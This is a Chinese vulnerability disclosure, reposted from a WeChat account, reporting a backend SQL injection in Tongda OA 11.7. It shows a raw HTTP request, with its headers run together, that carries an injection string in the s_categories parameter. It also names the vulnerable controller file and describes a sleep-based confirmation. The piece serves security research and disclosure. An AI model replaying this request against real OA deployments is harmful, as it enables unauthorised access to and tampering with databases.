POST /general/appbuilder/web/report/repchart/dataHTTP/1.1UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=X-ResourceType: xhrCookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbefConnection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 539x-wvs-id: Acunetix-Deepscan/288Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8data_path=%5B%5D&s_categories="23fd<>select 9j@!fdf" #)&i_dataset=10¶ms%5BsearchParams%5D%5B0%5D%5Bid%5D=¶ms%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212¶ms%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID¶ms%5BsearchParams%5D%5B0%5D%5Btype%5D=text¶ms%5BsearchParams%5D%5B0%5D%5Bvalue%5D=¶ms%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal¶ms%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false¶ms%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep¶ms%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=
漏洞证明:
查看Mysql数据库的执行过程,mysql日志文件,可以发现s_categories传入的参数,被mysql数据库完整执行了,没有任何过滤,可以确定存在 mysql注入漏洞
漏洞文件:
webrootgeneralappbuildermodulesreportcontrollersRepChartController.php
测试执行sleep函数,注释后面语句来测试,被成功执行。
挖掘思路:
Fuzz+sql日志关键字匹配+审计
联系微信
END.
欢迎转发~
欢迎关注~
欢迎点赞~
本文始发于微信公众号(黑白天):0Day | 通达OA 11.7 存在后台SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论